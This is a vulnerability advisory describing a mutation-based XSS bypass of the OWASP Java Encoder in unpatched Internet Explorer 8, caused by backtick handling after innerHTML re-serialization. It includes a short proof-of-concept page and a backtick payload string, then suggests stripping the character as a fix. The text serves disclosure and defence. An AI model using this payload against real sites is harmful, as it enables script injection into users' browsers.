OWASP Java Encoder suffers from a cross site scripting bypass vulnerability when it comes to the use of backticks.
e201eb39628f1a3e446bebe36150d242b93041dab9381b0f61668518f32cf0d3
*#Product: OWASP Java Encoder*
*#Vulnerability: Mutation Based XSS Bypass *
*#Impact: Medium/Limited*
*#Authors: Rafay Baloch And Alex Infuhr*
*#Company: RHAinfoSEC *
*#Website: http://services.rafayhackingarticles.net
<http://services.rafayhackingarticles.net>*
*#Status: To be fixed in the next release*
*=========*
*Description*
*=========*
Owasp encoder is an encoding library, that attempts to protect the website
users by encoding any un-trusted input before it's reflected back.
*=========*
*Vulnerability*
*==========*
The issue occurs inside of internet explorer only because treats accent
grave ` as a delimiter character, and we can escape out of a valid
attribute inside of an un-patched IE 8, since it does not put double quotes
around our vector when it's returned via innerHTML property.
*=============*
*Proof of concept*
*=============*
Here is the POC that came by slightly modifying the following example at
html5sec.org#59.
The POC was tested in Internet explorer version 8:
<html>
<head>
</head>
<div id="a"><input value="``onmouseover=alert(1)"></div>
<div id="b"></div>
<script>b.innerHTML=a.innerHTML</script>
</html>
*Attacker's Input:*
``onmouseover=alert(1)
*Vulnerable Browsers Output:*
<div id="a"><input value=``onmouseover=alert(1)></div>
*Patched Browsers Output:*
<div id="a"><input value="``onmouseover=alert(1)"></div>
When the above POC is tested inside of an unpatched Internet explorer 8, it
was noticed that IE 8 does not places quotes around it when it's rendered
by innerHTML property. However, When placed in a patched version of
internet explorer, it places double quotes around when the string is
returned back to the user, hence stopping the attack.
*===*
*Fix*
*===*
Currently, I am not aware of any other solutions then stripping out the
accent grave character, encoding doesn't seems to solve the problem here.
*==========*
*References*
*==========*
http://html5sec.org/#59
http://www.slideshare.net/x00mario/the-innerhtml-apocalypse
https://cure53.de/fp170.pdf